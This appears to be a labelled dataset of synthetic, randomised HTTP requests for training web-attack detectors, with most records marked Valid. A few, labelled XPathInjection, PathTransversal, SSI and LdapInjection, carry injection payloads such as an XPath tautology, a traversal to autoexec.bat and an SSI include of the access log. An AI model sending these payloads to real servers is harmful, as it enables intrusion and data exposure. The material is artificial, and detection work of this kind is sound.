Max-Forwards: 34
MIME-Version: 3.9
Pragma: 6='u'
Proxy-Authorization: NTLM bk5mMWhvODhwR2VwaGlhZXM3c3hvZXJhc2h5Z25xaXRlbkp4Ym51eA==
Authorization: NTLM aWFtYnNtZXNvdnkwdWJVdHNvcmF0c2lxZFRsNnVhcmhpeQ==
Range: 5-355295,61313-1,05930-37268
Referer: /rrowcws/trenE.tiff
TE: deflate;q=0.5,chunked,trailers
Trailer: Accept
User-Agent: Mozilla/5.2 (Windows; U; WinNT 5.8; uo-ee; rv:4.2.6) Gecko/09186958
UA-CPU: MIPS
UA-Disp: 6128,5212,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 552x911
Via: ojlar/9.7 66.173.70.128:7, 5.9 253.35.248.122
Transfer-Encoding: toti5w; teointe=ieorn0s
Upgrade: ooemaN/5.3, ditt/1.9, elyst/6.6
Warning: 317 www.nwo2aaL.html "hrhexamatrte3elRbtn" 
X-Forwarded-For: 248.234.188.76
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10397
Start - Id: 5382
class: Valid
PUT /jfrlefbe/hzk7zrKbirK/b662T6BAW@RPTpRs9h/osTrIk9qvo79RrYyzG73/sgesum/c43Plso/1k.Vn6-EL.html? HTTP/1.0
Content-Length: 229
Content-Language: Lritam,e
Content-Encoding: deflate
Content-Location: /bint/sarp/h9Nl/tiaalle/aRrdap.gif
Content-MD5: b3AzdGU3aXRzaHJjcnQ5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Dec 04 10:35:07 CET
Last-Modified: Thu, 27 Apr 06 14:41:40 UTC
Host: www.tsrbag.org
Connection: OvoT2e
Accept: */*
Accept-Charset: macintosh;q=0.4, iso-8859-5, windows-1257;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 127.31.233.225
Cookie: suop=149772;og=62386;tap89nxrd3=574253233;BconnecthEU0-1=wDl
Cookie2: $Version="21"
Date: Wed, 27 Jan 10 13:06:08 CET
ETag: "KpoJdC8IOHh0PCG"
Expect: rftTqE=eUtiR;Fnmuttp
From: nojeamee@zitf6g.it
If-Modified-Since: Wed, 26 Nov 08 15:00:01 GMT
If-Unmodified-Since: Tue, 13 Jul 04 13:27:06 CET
If-Match: "u_mPjut.5FG@coOJUo"
If-None-Match: "e3f7umsu5PI2Rr3"
If-Range: Thu, 29 Oct 09 21:43:37 UTC
Max-Forwards: 8
MIME-Version: 9.7
Pragma: haou9nLh='tg'
Proxy-Authorization: hjrb rneuidoi=tA3pN
Authorization: fes3 ohat=hztlna
Range: 429-04732,0-0702,6-47430
Referer: http://www.deys.uk/hr6f/k4sr.nsf
TE: chunked,trailers
Trailer: Pragma
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 2.4; hI-Se; rv:6.6.3) Gecko/68141197
UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 237x186
Via: 5.1 209.69.61.142:72, 3.6 www.0etHD.tiff:6, 3.0 www.Pannt.png
Transfer-Encoding: gzip
Upgrade: m4rr/9.8, leutb/5.3, pbd/7.7
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

retsrrt=1461&n6SKMSbdeN=8396699&rc=c9ZJRGVT0j&akWndrnhAmae=l5AvMZZVNOD&rasreriEtovrp1i=47085390&bQetcnWitxou9to=rGu3jy30&1emEdi7l=jlyaehoe&et=095217284&ihryelar=277150&abra=rJmjhe&DRlogwhgF0=ednsiIh9exhca&nnetau=76&YOIQ0xog=twn d

End - Id: 5382
Start - Id: 2753
class: Valid
GET /ClorcpepsqqtL/QG5BHuN/likeE2XXT.html?cFQNE=sSa&oex=ee3heptot9e&bwaitl=AgoIc4Scld&Nrrlcatvxcsusl=6nodeu&vzcBBCpWG=08&5ea25=almei%3Ai+nsopen HTTP/1.0
Host: www.msead4E.net:80
Connection: close
Accept: */*
Accept-Charset: windows-1251;q=0.7, big5, x-mac-cyrillic;q=0.2, windows-1255;q=0.1
Accept-Encoding: gzip, identity
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 205.37.124.236
Cookie: dyla5neessaaB2v= aprocessing-instructionnq2rboshentn;oelcwrSBe=tM27=;QpX8dVe=17
Cookie2: $Version="7"
Date: Sat, 19 Aug 06 12:46:10 UTC
ETag: "tM0h4IJKy1GWUH4D"
Expect: 100-continue
From: lqlhi@vaenn.fr
If-Modified-Since: Sat, 21 Feb 09 04:40:15 CET
If-Unmodified-Since: Thu, 31 Jan 08 06:06:32 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 363
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: o3t1cS otL4ea=et6ncym
Range: 599053-
Referer: /4eshvd/rnSc.mspx
TE: chunked,chunked,chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: 9M1_3231UK http://www.f8Yrha.uk
UA-CPU: PowerPC
UA-Disp: 9580,602,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 738x004
Via: 7.7 246.110.46.23, 5.1 141.154.73.151, 9.4 136.181.190.136
Transfer-Encoding: theA
Upgrade: xn47/8.4, esrand/2.5, wMro/9.9
Warning: 048 www.yigv.gif "cdtfsiao" "Mon, 13 Oct 08 01:16:56 UTC"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2753
Start - Id: 49278
class: XPathInjection
GET /st4PaeK/bG9QaHb8BI1SY2Zp_.-d/dcineebe1saIfxng/elKkposition.css?tnhcnrrkieyr=r4%2Fltaebr%2Fxu%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D74%5D+++%7C++++a%2Fvn%2Feal%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D+or+++%27YDni%27%3D++%27&tcVa8idr7so=gXx.%40So3yDZJ&serjcnodaD=0275442&g3eUaeetb=4716&nsln=tie&.img5imgV8O=f+r0m&nci4=1180&njmi=tliSXk8ZEn HTTP/1.1
Host: 105.255.99.50
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 214.56.183.168
Cookie: nzr=:ibetweene+
Cookie2: $Version="238"
Date: Sat, 18 Mar 06 02:23:02 GMT
ETag: W/"JPmR9_9ZPrUkFgwSt4"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 13 Sep 08 22:08:48 UTC
If-Unmodified-Since: Thu, 12 Mar 09 16:42:51 CET
If-Match: "Oq2syz7Gl3Ss1.1dfLqH"
If-None-Match: "wHnvcYP2A52kht@BYD4P"
If-Range: *
Max-Forwards: 828
MIME-Version: 9.5
Pragma: 3nfvts='i2E'
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: Basic bmRhb25TYkw6Y2U0cg==
Range: 305761-528973
Referer: /Aguud.bin
TE: gzip,trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/9.3 (X11; U; Linux i386 2.6; ys-he; rv:4.2.1) Gecko/76486670
UA-CPU: x86
UA-Disp: 3091,890,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 666x0440
Via: FTP/9.7 144.243.219.213, oDael/3.5 www.8aQcmS.css
Transfer-Encoding: gzip
Upgrade: iedn/7.3, nh9e/5.6, 2l7Pr/8.1
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49278
Start - Id: 45901
class: PathTransversal
GET /dNVQa9ah_HG6k/zAWqTeb/sFX2unWq1D/dc@g3O5fedA9@c1/lafkxosn0o.cgi?BKl4Ey9QhtaccesbV=bodyxwindow.open+l&4ehUt4azi=eon&xsie1eh4ktRt2m=eann0binR6isahupdateesyo2in&xmuSwinnteMF=eq&tzIfoaeneS=ias&dugwspb=eirl3cs&snn0etrehsNraav=14519788&rku4rUzTd=%5Cautoexec.bat&zyrotyr=80692244&m0=otUl&eJ0wK6W4M=teHtSrhe4plHnti&4n=snsefqBRiA4Zy&st=c%7Es%2Bo%28iscriptkDiq HTTP/1.1
Host: www.Nzetspenh.net:80
Connection: keep-alive
Accept: text/xml
Accept-Charset: macintosh, windows-1255, utf-7
Accept-Encoding: 
Accept-Language: EEi-HhanLe, 5xadig-xn, cet74so-rU;q=0.5
Cache-Control: max-age=4035
Client-ip: 150.120.252.37
Cookie: atsdtsoybenb=sqoeonjsehe
Cookie2: $Version="32"
Date: Wed, 06 Feb 08 22:30:58 CET
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Mon, 08 Mar 10 07:13:44 UTC
If-Match: "i6ctgOuQxlD2XJs"
If-None-Match: "9ibFJQtfd7.v6Zo6.vS5"
If-Range: Sat, 05 Nov 05 03:25:14 GMT
Max-Forwards: 7
MIME-Version: 4.5
Pragma: br='ettwoSa'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest nc=3A514cE2
Range: -431939,983-,0-
Referer: http://lnho.it/eonahoa/Vrsenrf.swf
TE: trailers
Trailer: Accept-Encoding
User-Agent: if5ladgiex
UA-CPU: StrongARM
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: HTTP/4.2 www.uibro6G9.jpg, FTP/0.4 249.196.187.10
Transfer-Encoding: compress
Upgrade: esaee/2.2, iau/2.7, hrA1n/8.8, eet/8.3, 3umqCt/3.7
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 30.193.214.158
X-Serial-Number: 447963296121692
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45901
Start - Id: 19406
class: Valid
GET /rhOeTOOYfAQDjB3yo.mspx?4rosa2jtyht2bi=uutoeogi&rsufeh7koeCr=%3D4mis&apB@yrhVr=d6execm%3Drc%28passwd%7Chtacces&eHliu6esbsIo=e-oaK6_VgSbZ&p4ietOaslioue=dMuL0&zNfdesebuascL=4&gt0mndstvlPaeei=nKfKGSv7poW&Dvbscriptjyy.7GSB=ydengd3&indehQ7=882&kbodyW32V4S=ehi&klu=1323&madee=%24e0d&heccgbu0ThYaede=9&hlir1ir=+ssam HTTP/1.1
Host: 189.205.141.116
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.6, x-mac-greek;q=0.9, cp-950;q=0.7
Accept-Encoding: 
Accept-Language: S-umz;q=0.1
Cache-Control: no-store
Client-ip: 231.68.119.139
Cookie: 3ci=aeceIstyleNp iulsa;dwYuswardtgwr=ceodd5wrlnai;zafrntdtoe2hal=etd/m;u4o04=01;orUThkS8=upnatcnst9sSrl
Cookie2: $Version="3"
Date: Thu, 06 Apr 06 15:42:31 CET
ETag: W/"un6rCW@GAPiCzDRNfQ"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Sat, 03 Oct 09 19:55:53 GMT
If-Unmodified-Since: Mon, 12 Sep 05 02:53:37 UTC
If-Match: "zPVVb6DxZwNYtEbR-"
If-None-Match: *
If-Range: Mon, 30 Aug 04 17:28:22 GMT
Max-Forwards: 391
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: ooUed4 n7cRe9So=luAanwo5
Authorization: Basic Y2RmYXRndHQ6ZWVkdWVz
Range: -6815,05-
Referer: http://B9cia.it/nriH07/csdu/StYtam/bsec.doc
TE: chunked
Trailer: Expect
User-Agent: rdh5e40/9.8
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6070x723
Via: 1.9 www.0chma.shtml:02001, 8.2 15.138.46.183
Transfer-Encoding: compress
Upgrade: 0hnhm/0.0
Warning: 515 6.189.134.75 "7iimeytvetemune1t9e" 
X-Forwarded-For: 72.140.87.177
X-Serial-Number: 605477646690730
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 19406
Start - Id: 21885
class: Valid
GET /aB5iPzFQUVlxV/mseti9bmxcysrrnapnIg.jpeg? HTTP/1.1
Host: 125.17.210.232:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1252, iso-8859-9;q=0.2
Accept-Encoding: *
Accept-Language: xcea-n, ooehyrd-8hko7lqe, rhooh-vusLc0eh
Cache-Control: dR=znx3k
Client-ip: 77.124.253.80
Cookie: 50rLZAmeta90F=8520434;YGff8insertmetahtaccesxzj=4682
Cookie2: $Version="1"
Date: Fri, 05 May 06 16:40:34 CET
ETag: W/"yjNA9XkPUWq5sNl"
Expect: ohTw2=3Sm4tlko;zoeayq
From: gspde@ia3eGzume.be
If-Modified-Since: Mon, 27 Oct 08 16:58:34 CET
If-Unmodified-Since: Sat, 21 May 05 01:14:35 UTC
If-Match: *
If-None-Match: *
If-Range: "ge6XUtF4MBe.-9Z"
Max-Forwards: 98
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: Basic YmdudHNhbFM6YUxlZ2RnekU=
Range: -34244,001-
Referer: http://www.Iwartre.org/e8o9/1msxee/qioo6ot/brrl.cfm
TE: gzip,trailers,gzip;q=0.0
Trailer: Trailer
User-Agent: fPrIwVy3az http://www.nmtl9.cz
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 196x452
Via: royg/6.7 95.191.140.210, Odtnn4/7.6 www.t0tla.css, 8.5 www.eLshuec.tiff
Transfer-Encoding: gzip
Upgrade: cuSa/4.1, ehd/3.9, ecn/7.5
Warning: 810 48.19.38.105 "wocweaael2R4t" "Mon, 17 Nov 08 22:16:35 GMT"
X-Forwarded-For: 182.115.130.238
X-Serial-Number: 3182273
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21885
Start - Id: 39520
class: SSI
GET /QZ@TXOIKlOZprocessing-instructionm12/sdzUWG.php? HTTP/1.1
Host: 121.18.178.188
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: aoiteE-Ph4daor;q=0.4, btngl-tCZlt;q=0.5, 96bXraSu-7bgnataa;q=0.5, dqR-mDswihi, rtxe-iydtaTi
Cache-Control: no-store
Cookie: zudnxstfal=2oerseoc;.petchtaccesDx=<!--   #include     virtual="/var/log/httpd/access.log"   -->
Cookie2: $Version="170"
Date: Wed, 31 Oct 07 05:31:12 UTC
ETag: W/"WeRrPImoBrnYtxGi@o"
Expect: 100-continue
From: w9dere@3huy10.be
If-Modified-Since: Sat, 08 Aug 09 22:09:43 GMT
If-Unmodified-Since: Wed, 30 Aug 06 19:44:21 CET
If-Match: "B.rLOzXQ6@_mYDZ"
If-None-Match: *
If-Range: Fri, 30 Dec 05 01:07:24 GMT
Max-Forwards: 1746
MIME-Version: 8.9
Pragma: wfn='eF0'
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM TmFpbGVvZnRvYmVzb3NodWt3dW9sdEV0d21lZW5ubWFub2Vld3llb2R1c28=
Range: 649-,-625813
Referer: http://uenee.be/amGs/teatvu/Ep2o.htm
TE: trailers,gzip
User-Agent: Mozilla/3.8 (X11; U; Solaris 0.9; tK-ic; rv:5.0.3) Gecko/78156319
Via: t1pe/5.4 169.249.13.54, uhngn/2.3 62.129.155.213:70166, 1.3 www.eb9a.html
Warning: 371 169.121.60.122 "odtnnnle4TbLdinltnP" "Fri, 09 Jan 09 20:17:43 GMT"
X-Forwarded-For: 81.239.118.138
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39520
Start - Id: 13858
class: Valid
GET /tjrea.mdb?zainatEdTe3=%26n&edt=68265 HTTP/1.0
Host: 27.13.146.175
Connection: Wieeopsl
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ee-oiy;q=0.6, 88-a2eble
Cache-Control: min-fresh=926
Client-ip: 124.143.227.1
Cookie: aa=having ;MVWB=EcIxdTni>e>;xstojgiopUi=4FfAsU0iAO;cceg=)&uove
Cookie2: $Version="94"
Date: Fri, 27 Feb 09 08:22:51 UTC
ETag: "eVl0Z8xpNhdriwgK"
Expect: aceiilri
From: aopeat@lwiRaar.be
If-Modified-Since: Wed, 07 Jan 09 02:54:57 CET
If-Unmodified-Since: Fri, 25 Jan 08 09:35:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0547
MIME-Version: 4.6
Pragma: ia='vh'
Proxy-Authorization: Digest uri=http://jtniUa0.be/sshsYek/edee/srituvaa/attl.msf
Authorization: strae xsee=a1lnrnio
Range: -918417
Referer: http://www.acivH.fr/3apovEd/tei7ahe/mczNctt/cr3e.avi
TE: deflate,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.9 (Windows; U; Win 9x 7.9; e0-fw; rv:7.9.7) Gecko/17665273
UA-CPU: 68000
UA-Disp: 4060,2972,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 750x449
Via: 7.3 www.rtAF.html:428, 9.8 243.194.236.102:51, 3.0 92.67.235.51
Transfer-Encoding: identity
Upgrade: dee/6.6, qx6San/1.4, EaHU/5.9, nHtl/9.9, narr/5.4
Warning: 484 241.93.184.248:77 "o0ohbhcf" "Fri, 27 Apr 07 20:20:14 UTC"
X-Forwarded-For: 225.116.111.136
X-Serial-Number: 2424153746137739
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13858
Start - Id: 10607
class: Valid
GET /Et3grta.swf?he79i=ehar%3E%3Enh%7CHehei&shntsrtt6e=Nn&l2hhePyI=42522677&eteadecohuie=nrL&a2uhamfn=%7E6 HTTP/1.0
Host: www.cl7i.be:60
Connection: etdSei
Accept: */*
Accept-Charset: isiri-3342;q=0.8, euc-tw;q=0.9, gb2312;q=0.2
Accept-Encoding: deflate, gzip, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 70.48.78.78
Cookie: Soin=idahitworadnselpby;tle2iei=otc(buylvbscripta zre8AHuX;ta=<;ianUt=t;dto;b1YivE6=804950;tr3oflon0=dpsk
Cookie2: $Version="1"
Date: Sun, 11 Jul 04 16:01:03 UTC
ETag: W/"m8setTt.CEOTvQMHTtS_"
Expect: 100-continue
From: urh4ame@uIj4a1nz.ch
If-Modified-Since: Tue, 19 Jan 10 11:21:27 UTC
If-Unmodified-Since: Fri, 08 May 09 19:49:49 GMT
If-Match: *
If-None-Match: "D2_Ot_JBPtNwC_bOo"
If-Range: "7yOo7yKmV2xwkyF-"
Max-Forwards: 234
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM YUdyVGlhaDVsYmVoMGQ4Z09oMWVhaDdlMXdhZWl5dDNsZXo5OHlz
Authorization: Digest realm
Range: -8,-00,5230-
Referer: /atbOp/kcbd/rlsfcmM/aip8lpla/elfs.mdb
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.6 (X11; U; SunOS sun4u 1.6; N0-tr; rv:1.3.5) Gecko/81393969
UA-CPU: Sparc
UA-Disp: 4542,2926,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9748x5631
Via: 6.6 7.55.14.80:5, 7.6 www.lEnsewbh.jpg, hwssUs/2.3 www.A8nd.html
Transfer-Encoding: identity
Upgrade: telnx/9.9, iusnr/3.5
Warning: 595 239.203.101.239 "rlhjs5iafegTthd" "Tue, 05 Feb 08 07:12:57 UTC"
X-Forwarded-For: 93.154.42.186
X-Serial-Number: 719045121636524930
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 10607
Start - Id: 38970
class: LdapInjection
GET /s4vJekinNWH6l7Gf/utaWebntyanmtt4i/rehK872XEdegS.png?ahNb=mC%24nbEhtwsofh&de=u5e1enull&hdkmfearesP0n4b=mb8RmcT&xlQservices8=3398500941&sts=zad%29%28%26%28objectClass+%3D+++dte*%29&eln2wheg5rr=IQ73espazxtllioowI&@WchildY=504352&fohisml1e=ssodgfeomecvwrp&5to=ynxtermus&iaAsBs7=hrpymrt%26e%27wuwshp&SpLjes=sh&ueomVFeoartGAee=mhttpmochauopenfeToon&XPunionxterm=ndhn8rtqiut&wwdrs8Cltn=6eupdateutiautoexecxtermr HTTP/1.0
Host: www.eehic.de:95820
Connection: cujlgd
Accept: video/*;q=0.5, application/x-tar;q=0.6, application/zip;q=0.2
Accept-Charset: windows-874
Accept-Encoding: identity, compress;q=0.8
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 191.31.153.249
Cookie: s6nowlds=se2;e9tsmSsc1=h8m7UaeKbI01;ellpzhoahobn9=aou
Cookie2: $Version="8"
Date: Sat, 03 Jul 04 15:02:19 GMT
ETag: W/"dRxAxqumEJEBKcg"
Expect: 100-continue
From: hisAka@u5t1a5.st
If-Modified-Since: Sat, 23 Sep 06 12:49:48 UTC
If-Unmodified-Since: Sun, 06 Jan 08 13:27:38 CET
If-Match: "Rl7tXdkFwsQdS-_"
If-None-Match: *
If-Range: *
Max-Forwards: 2475
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: oestn o6ftes=tfla
Range: 840-3
Referer: http://5jnfeU9.it/esifbi/tn8ae/5v1ohee/chizoe/e11uonwm.dll
TE: chunked,trailers,trailers
Trailer: Via
User-Agent: ou3f/5.8.7.7.2
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0621x5666
Via: 3.6 210.141.206.128, FTP/2.3 www.Twa9hco.gif, 9.1 www.e6tqase.css
Transfer-Encoding: identity
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 999 www.oaeahnta.png "eic0ioogCftiu" "Wed, 23 May 07 22:46:40 GMT"
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38970
Start - Id: 24222
class: Valid
GET /nrqtntb69disnLh66/anzehlooeftduatezr/5K6-N0V/1ZS./kttiemgcre1wtvfd3r/gaB_h@5JdQ/t1j/sYbWEO_CSLqq.bin?rlq-9homeH3zRR=lA1kKTZ&group bybody@tmp=Asennw&5tiltaerccua0=2528918&peenqnaneo=Orftms%3B60+&neaoedo=3&QtYd9X=l0cgqocnHbRitetxto HTTP/1.0
Host: 235.240.96.18:5
Connection: close
Accept: image/*;q=0.0, image/*;q=0.5, audio/x-wav;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 221.69.55.233
Cookie: bs=sB84;afna3eatodC2o=2mafDei9lo;5wLsrl5ishj=204776180;RaryxnZntorgedd=3908;piptdkstnsltn=6829414
Cookie2: $Version="15"
Date: Tue, 28 Dec 04 19:47:47 UTC
ETag: W/"sI6wnHXyKLr4eQ62Hiiy"
Expect: 100-continue
From: s0hwns@eIpjfyve7i.ch
If-Modified-Since: Mon, 20 Jul 09 08:45:00 UTC
If-Unmodified-Since: Thu, 02 Nov 06 22:52:22 CET
If-Match: "4dosQzElxenmJEk@yb71"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 8.0
Pragma: pao=sie
Proxy-Authorization: eate adtir=rn5cme
Authorization: onft ia2v=loo5
Range: -070237
Referer: http://www.hzkles2.uk/lttgrtic/etee/e6az.conf
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.0 (Windows; U; Win98 4.1; Wd-ie; rv:9.4.5) Gecko/75770834
UA-CPU: MIPS
UA-Disp: 7755,8327,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 628x6657
Via: 9.3 80.167.73.106, FTP/1.8 25.11.152.243, g5o/9.5 40.104.45.14:97
Transfer-Encoding: deflate
Upgrade: 0O9/0.3, eie/2.8, dasr/3.6
Warning: 335 157.183.177.154 "buOrqedamsso" "Thu, 14 Apr 05 06:20:30 GMT"
X-Forwarded-For: 150.25.145.182
X-Serial-Number: 42275938447231485
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24222
Start - Id: 20490
class: Valid
GET /euL-/vpRBx4NN6M-8kY/nDvkPpA6zDie/ttiioreuuhesi/ipoor7smoettInoon/ee/c1hHAHhQ-uW4Zrs7-/n9eacIieoezM/Y8perlB/sUwVOmT7BR8BBh/pwP5Eiydte0aOwk1KtyU/nSEPLvbscripte1NHCu.msf?si=%29ln&rHnerevy=359&Csisds=fnepszhedrea&nKarcI6=hkWaLYpXC_v&aparaiouleci9ee=58624109&a1ttlltr=a5vseoathrEr&m3ecDtrdair=mevalrpfgmeedr+ueeh HTTP/1.1
Host: 180.201.67.203
Connection: close
Accept: */*
Accept-Charset: us-ascii;q=0.3, iso-8859-9;q=0.1, x-mac-roman, ks_c_5601-1987, x-mac-arabic
Accept-Encoding: deflate, compress, gzip, identity;q=0.5
Accept-Language: int4tdrE-imamu, il-uwn5i
Cache-Control: only-if-cached
Client-ip: 41.73.177.128
Cookie: r2eyoRva=PAophpetosock_stream5rAemi;Tthadrt=n2r3iQjLq@;IKQ9exhtRX3P=770
Cookie2: $Version="3"
Date: Wed, 14 Oct 09 10:37:17 GMT
ETag: "nBv5pr0uTxIEiVEB"
Expect: 100-continue
From: dsreo@aregoinma.st
If-Modified-Since: Thu, 12 Apr 07 23:06:16 CET
If-Unmodified-Since: Sat, 18 Sep 04 08:41:36 CET
If-Match: "VWA98IMdx9jCyJsh0B"
If-None-Match: "inLkr@qYVmZlt.ueOOzA"
If-Range: Fri, 25 Feb 05 17:59:10 CET
Max-Forwards: 3
MIME-Version: 4.7
Pragma: Jo='et69'
Proxy-Authorization: Basic c25FaXRiOnNhZWJ1
Authorization: Digest algorithm=MD5
Range: 382-7
Referer: http://iotifn.st/serlli/tmaoN15.doc
TE: gzip,trailers
Trailer: From
User-Agent: a8qtwttmttuyri
UA-CPU: MIPS
UA-Disp: 428,0883,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3372x6941
Via: 2.3 www.pteor.gif, HTTP/2.9 www.uwiaoe.htm, FTP/6.5 www.0eha.png
Transfer-Encoding: gzip
Upgrade: esoio/0.9
Warning: 199 www.ztlqcle.jpeg:4074 "oikhvtxteeeeatnI" "Wed, 14 Feb 07 19:29:02 UTC"
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 025237618
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20490
Start - Id: 23544
class: Valid
GET /eCkVWuItz8ly09vgoU/my7UDE.php4?eelaw=astsdlqr&nbhnoeda=hntiNipeierso6a9&oEhsMiabapcg=82931&cpmth5e=e6&1aogtte=ob2w_Z%409KQ&tapdatnweenn=448161 HTTP/1.0
Host: 48.62.126.144:01
Connection: bssttnjt
Accept: */*
Accept-Charset: macintosh
Accept-Encoding: *;q=0.5
Accept-Language: eer-j;q=0.8, S-t;q=0.3, e7rexlc-arrnT, nOoe-ts;q=0.6, Re41ml6-rsivnht
Cache-Control: no-cache
Client-ip: 147.104.162.8
Cookie: oct8et=sdJlM;ytoehe6ehi=1346799;gelacuoyeyrn2rs=l;hjooniryrem=224939;xQrd39v8h=robTNt
Cookie2: $Version="925"
Date: Sat, 28 May 05 17:11:46 UTC
ETag: "ATZ1OC@4L_0pKrDwRh"
Expect: 100-continue
From: quutbO@cbfau.st
If-Modified-Since: Fri, 06 Jul 07 16:15:45 GMT
If-Unmodified-Since: Mon, 02 Jul 07 04:17:23 GMT
If-Match: "mThJT1RAS.yFBY5r6"
If-None-Match: "@fkat.TTpeG6IlTP8v"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Basic bnVoc2JvOmVBcnlpaUNi
Range: 9-582047,9-,23678-00
Referer: http://www.yta1HRtc.it/aTuuan/2easasz/ac0lraro.bin
TE: gzip
Trailer: Referer
User-Agent: ttxako9U/0.2.0.3
UA-CPU: StrongARM
UA-Disp: 3395,981,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4426x0282
Via: HTTP/4.4 www.o0lto.css, 0.0 129.73.157.82, mMy/0.1 www.irlturA.jpg
Transfer-Encoding: compress
Upgrade: Els/5.8
Warning: 266 191.138.56.230:98 "diio" "Tue, 17 Apr 07 03:38:46 CET"
X-Forwarded-For: 224.154.235.176
X-Serial-Number: 4147568575468348
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23544
Start - Id: 8954
class: Valid
